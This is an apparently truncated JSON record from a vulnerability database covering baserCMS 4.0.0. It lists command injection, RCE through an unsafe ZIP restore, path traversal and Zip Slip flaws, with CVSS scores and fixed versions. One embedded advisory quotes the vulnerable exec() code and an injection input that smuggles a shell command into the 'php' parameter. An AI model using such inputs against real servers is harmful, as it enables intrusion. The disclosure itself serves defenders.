{"url":"http://public2.vulnerablecode.io/api/packages/54019?format=json","purl":"pkg:composer/baserproject/basercms@4.0.0","type":"composer","namespace":"baserproject","name":"basercms","version":"4.0.0","qualifiers":{},"subpath":"","is_vulnerable":true,"next_non_vulnerable_version":"5.2.3","latest_non_vulnerable_version":"5.2.3","affected_by_vulnerabilities":[{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/54253?format=json","vulnerability_id":"VCID-1q79-sxzp-zker","summary":"OS Command Injection\nbaserCMS allows a remote attacker with an administrative privilege to execute arbitrary OS commands via unspecified vectors.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20682","reference_id":"","reference_type":"","scores":[{"value":"0.02357","scoring_system":"epss","scoring_elements":"0.8521","published_at":"2026-06-04T12:55:00Z"},{"value":"0.02357","scoring_system":"epss","scoring_elements":"0.85235","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-20682"},{"reference_url":"https://basercms.net/security/JVN64869876","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://basercms.net/security/JVN64869876"},{"reference_url":"https://jvn.jp/en/jp/JVN64869876/index.html","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://jvn.jp/en/jp/JVN64869876/index.html"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20682","reference_id":"CVE-2021-20682","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"va
lue":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20682"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/80118?format=json","purl":"pkg:composer/baserproject/basercms@4.4.5","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-5ay3-1t5g-vycu"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-891u-x525-ykbb"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-hpk4-a6tr-3ffe"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.4.5"}],"aliases":["CVE-2021-20682","GHSA-g39q-f4rm-85x4"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-1q79-sxzp-zker"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91611?format=json","vulnerability_id":"VCID-3new-f12y-8bf9","summary":"baserCMS has Unsafe File Upload Leading to Remote Code Execution (RCE)\n### Details\nThe application's restore 
function allows users to upload a `.zip` file, which is then automatically extracted. A PHP file inside the archive is included using `require_once` without validating or restricting the filename. An attacker can craft a malicious PHP file within the zip and achieve arbitrary code execution when it is included.\n\nVector: Malicious ZIP upload + insecure `require_once`\n\n### PoC\n1. Restore backup\n   ![image](https://github.com/user-attachments/assets/9e59768a-4a8e-472d-aaef-5d54546080f6)\n1. Load file shell (insecure `require_once`)\n   ![image](https://github.com/user-attachments/assets/8f7919a2-c7f3-4ae1-af6c-1b0057e4ba22)\n   ![image](https://github.com/user-attachments/assets/c10ef049-459d-429e-a608-8fb220c3387f)\n\n### Impact\nRemote Code Execution (RCE)","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2025-32957","reference_id":"","reference_type":"","scores":[{"value":"0.00031","scoring_system":"epss","scoring_elements":"0.09459","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2025-32957"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","referenc
e_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T18:39:21Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-hv78-cwp4-8r7r"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-32957","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-32957"},{"reference_url":"https://github.com/advisories/GHSA-hv78-cwp4-8r7r","reference_id":"GHSA-hv78-cwp4-8r7r","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-hv78-cwp4-8r7r"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2025-32957","GHSA-hv78-cwp4-8r7r"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-3new-f12y-8bf9"},{"u
rl":"http://public2.vulnerablecode.io/api/vulnerabilities/91137?format=json","vulnerability_id":"VCID-4zw8-truk-pugf","summary":"baserCMS has OS Command Injection Leading to Remote Code Execution (RCE)\n## Summary\n\nIn the core update functionality of baserCMS, some parameters sent from the admin panel are passed to the `exec()` function without proper validation or escaping. This issue allows **an authenticated CMS administrator to execute arbitrary OS commands on the server (Remote Code Execution, RCE)**.\n\nThis vulnerability is not a UI-level issue such as screen manipulation or lack of CSRF protection, but rather stems from **a design that directly executes input values received on the server side as OS commands**. Therefore, even if buttons are hidden in the UI, or even if CakePHP's CSRF/FormProtection (SecurityComponent) ensures that only legitimate POST requests are accepted, **an attack is possible as long as a request containing a valid token is processed within an administrator session**.\n\n---\n\n## Vulnerability Information\n\n| Item | Details |\n| ---- | ------- |\n| CWE | CWE-78: Improper Neutralization of Special Elements used in an OS Command |\n| Impact | Remote Code Execution (RCE) |\n| Severity | Critical |\n| Attack Requirements | Administrator privileges required |\n| Reproducibility | Reproducible (confirmed multiple times) |\n| Test Environment | baserCMS 5.2.2 (Docker / development environment) |\n\n---\n\n## Affected Areas\n\n- **Controller**\n  - `PluginsController::get_core_update()`\n- **Service**\n  - `PluginsService::getCoreUpdate()`\n- **Affected Endpoint**\n  - `/baser/admin/baser-core/plugins/get_core_update`\n\n---\n\n## Technical Details\n\n### Vulnerable Code Flow\n\n```text\nPluginsController::get_core_update()\n  ↓ Retrieves php parameter from POST data\nPluginsService::getCoreUpdate($targetVersion, $php, $force)\n  ↓ Concatenates $php into command string without validation or escaping\nexec($command)\n```\n\n### Relevant 
Code (Excerpt)\n\n**PluginsController.php**\n\n```php\n$service->getCoreUpdate(\n    $request->getData('targetVersion') ?? '',\n    $request->getData('php') ?? 'php',\n    $request->getData('force'),\n);\n```\n\n**PluginsService.php**\n\n```php\n$command = $php . ' ' . ROOT . DS . 'bin' . DS . 'cake.php composer ' .\n           $targetVersion . ' --php ' . $php . ' --dir ' . TMP . 'update';\n\nexec($command, $out, $code);\n```\n\nThe `$php` parameter is user input, and **none** of the following countermeasures are in place:\n\n- Restriction via allowlist\n- Validation via regular expression\n- Escaping via `escapeshellarg()` or similar\n\n---\n\n## Attack Scenario\n\n1. The attacker logs in as a CMS administrator\n2. Sends a POST request to the core update functionality in the admin panel\n3. Specifies a string containing OS commands in the `php` parameter\n4. `exec()` is executed on the server side, running the arbitrary OS command\n\n### Example Attack Input (Conceptual)\n\n```text\nphp=php;id>/tmp/rce_test;#\n```\n\n---\n\n## Verification Results (PoC)\n\n### Execution Result\n\n```bash\n$ docker exec bc-php cat /tmp/rce_test\nuid=1000(www-data) gid=1000(www-data) groups=1000(www-data)\n```\n\nThe above confirms that OS commands can be executed with `www-data` privileges.\n\n### Additional Notes\n\n- Reproducible through the legitimate flow in the admin panel (browser)\n- Succeeds even with CSRF/FormProtection tokens included in a legitimate request\n- Failure cases (400/403) have also been investigated and differentiated\n- Confirmed reproducible via resending HTTP requests with tools such as curl (resending the same request containing valid tokens)\n\n---\n\n## Impact\n\nIf this vulnerability is exploited, the following becomes possible:\n\n- Retrieval of server information\n- Reading/writing arbitrary files\n- Retrieval of application configuration information (DB credentials, etc.)\n- OS-level operations beyond application permission boundaries\n\nAlthough 
administrator privileges are required, **this is a design issue where the impact extends from the application layer to the OS layer**, and the impact is considered significant.\n\n---\n\n## Recommended Fix\n\n### Primary Recommendation\n\n- Do not accept the PHP executable path from user input\n- Fix the PHP executable on the server side using the `PHP_BINARY` constant\n\n```php\n$php = escapeshellarg(PHP_BINARY);\n```\n\n### Supplementary Fix Recommendations\n\n- Apply `escapeshellarg()` escaping to other command-line arguments (version number, directory, etc.) as well\n- If possible, consider using execution methods that do not involve shell interpretation (array format, Process class, etc.)\n\n### Alternative (Not Recommended)\n\n- Allowlist validation for the PHP executable path\n- Combined use of regex validation and `escapeshellarg()`\n\nHowever, **from the perspective of reducing the attack surface, a design that eliminates user input entirely is recommended**.\n\n---\n\n## Additional Notes\n\n- This issue is independent of UI display controls (showing/hiding buttons)\n- As long as the endpoint exists, an attack is possible if a request containing valid tokens is processed\n- This is a problem stemming from the design-level handling of input, and cannot be prevented by CSRF or UI controls alone\n\n---\n\n## Conclusion\n\nDue to a design issue in baserCMS's core update functionality where user input is passed to `exec()` without validation, **Remote Code Execution (RCE) is achievable with administrator privileges**. 
This vulnerability can be fixed through input validation and design review, and prompt remediation is recommended.\n\nThis advisory was translated from Japanese to English using GitHub Copilot.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-21861","reference_id":"","reference_type":"","scores":[{"value":"0.00131","scoring_system":"epss","scoring_elements":"0.32198","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-21861"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g","reference_id":"","reference_type":"","scores":[{"value":"9.1","scorin
g_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-31T14:01:36Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-qxmc-6f24-g86g"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-21861","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-21861"},{"reference_url":"https://github.com/advisories/GHSA-qxmc-6f24-g86g","reference_id":"GHSA-qxmc-6f24-g86g","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-qxmc-6f24-g86g"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-21861","GHSA-qxmc-6f24-g86g"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-4zw8-truk-pugf"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/41774?format=json","vulnerability_id":"VCID-5ay3-1t5g-vycu","summary":"Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')\nBaserCMS is an open source content management system with a focus on Japanese language support. Users with upload privilege may upload crafted zip files capable of path traversal on the host operating system. 
This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41279","reference_id":"","reference_type":"","scores":[{"value":"0.00438","scoring_system":"epss","scoring_elements":"0.6349","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00438","scoring_system":"epss","scoring_elements":"0.63447","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41279"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336","reference_id":"","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/d8ab0a81a7bce35cc95ff7dff851a7e87a084336"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41279","reference_id":"CVE-2021-41279","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41279"},{"reference_url":"https://github.com/advisories/GHSA-4x2f-54wr-4hjg","reference_id":"GHSA-4x2f-54wr-4hjg","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-4x2f-54wr-4hjg"},{"reference_url":"https://github.com/ba
serproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg","reference_id":"GHSA-4x2f-54wr-4hjg","reference_type":"","scores":[{"value":"7.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-4x2f-54wr-4hjg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/59671?format=json","purl":"pkg:composer/baserproject/basercms@4.5.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerability":"VCID-u16w-rbuk-ybfs"},{"vulnerability":"VCID-uedz-j2vn-cbea"},{"vulnerability":"VCID-y2sz-c6vb-pkdp"},{"vulnerability":"VCID-zqd4-rdem-jfgk"},{"vulnerability":"VCID-zsgc-fnen-b7a6"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.5.4"}],"aliases":["CVE-2021-41279","GHSA-4x2f-54wr-4hjg"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-5ay3-1t5g-vycu"},{"url":"http://public2.vuln
erablecode.io/api/vulnerabilities/91016?format=json","vulnerability_id":"VCID-7x3n-4c2b-nfbx","summary":"baserCMS has OS command injection vulnerability in installer\nbaserCMS has an OS command injection vulnerability in the installer.\n\n### Target\nbaserCMS 5.2.2 and earlier versions\n\n### Vulnerability\n\nIf baserCMS is placed on a server but not installed, malicious commands may be executed.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page for more information.\nhttps://basercms.net/security/JVN_54513170\n\n### Credits\n\nREN XINGDIAN","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30880","reference_id":"","reference_type":"","scores":[{"value":"0.00055","scoring_system":"epss","scoring_elements":"0.17526","published_at":"2026-06-05T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-30880"},{"reference_url":"https://basercms.net/security/JVN_20837860","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"}],"url":"https://basercms.net/security/JVN_20837860"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/releases/tag/5.2.3","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC
:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"}],"url":"https://github.com/baserproject/basercms/releases/tag/5.2.3"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-31T15:27:05Z/"}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-6hpg-8rx3-cwgv"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30880","reference_id":"","reference_type":"","scores":[{"value":"9.2","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-30880"},{"reference_url":"https://github.com/advisories/GHSA-6hpg-8rx3-cwgv","reference_id":"GHSA-6hpg-8rx3-cwgv","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-6hpg-8rx3-cwgv"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/112578?format=json","purl":"pkg:composer/baserproject/basercms@5.2.3","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3"}],"aliases":["CVE-2026-30880","GHSA-6hpg-8rx3-cwgv"],"risk_score":null,"exploitability":null,"weighted_severity":null,"resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-7x3n-4c2b-nfbx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities
/41773?format=json","vulnerability_id":"VCID-891u-x525-ykbb","summary":"Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')\nThere are potential Zip Slip and OS command injection vulnerabilities in the management system of baserCMS. Users with permission to upload files may upload crafted zip files that may lead to execution of arbitrary commands on the host operating system. This is a vulnerability that needs to be addressed when the management system is used by an unspecified number of users. If you are affected, please update to the new version as soon as possible.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41243","reference_id":"","reference_type":"","scores":[{"value":"0.02799","scoring_system":"epss","scoring_elements":"0.86405","published_at":"2026-06-05T12:55:00Z"},{"value":"0.02799","scoring_system":"epss","scoring_elements":"0.86382","published_at":"2026-06-04T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2021-41243"},{"reference_url":"https://github.com/baserproject/basercms","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms"},{"reference_url":"https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff","reference_id":"","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/commit/9088b99c329d1faff3a2f1269f37b9a9d8d5f6ff"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41243","reference_id":"CVE-2021-41243","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1",
"scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2021-41243"},{"reference_url":"https://github.com/advisories/GHSA-7rpc-9m88-cf9w","reference_id":"GHSA-7rpc-9m88-cf9w","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7rpc-9m88-cf9w"},{"reference_url":"https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w","reference_id":"GHSA-7rpc-9m88-cf9w","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:L"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/baserproject/basercms/security/advisories/GHSA-7rpc-9m88-cf9w"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/59671?format=json","purl":"pkg:composer/baserproject/basercms@4.5.4","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-3new-f12y-8bf9"},{"vulnerability":"VCID-4zw8-truk-pugf"},{"vulnerability":"VCID-7x3n-4c2b-nfbx"},{"vulnerability":"VCID-8buz-nsr9-3yge"},{"vulnerability":"VCID-8ssu-umet-37bk"},{"vulnerability":"VCID-ays7-6wvh-augt"},{"vulnerability":"VCID-d1sf-cmct-zbh1"},{"vulnerability":"VCID-g56w-z9cx-5ygv"},{"vulnerability":"VCID-ggv8-3v9t-mfea"},{"vulnerability":"VCID-j37y-gws9-ake9"},{"vulnerability":"VCID-jby7-s5ez-dqb3"},{"vulnerability":"VCID-k575-suuf-7bhf"},{"vulnerability":"VCID-k5qv-4yp3-zbgf"},{"vulnerability":"VCID-khft-xvrw-g3dr"},{"vulnerability":"VCID-kmpp-6j49-pqfz"},{"vulnerability":"VCID-mfm9-gsh3-ubg8"},{"vulnerability":"VCID-nxrf-64er-xbfx"},{"vulnerability":"VCID-p695-t9ye-v3ga"},{"vulnerability":"VCID-pd8c-9d7z-zkhg"},{"vulnerability":"VCID-sqr4-v889-tff8"},{"vulnerabili
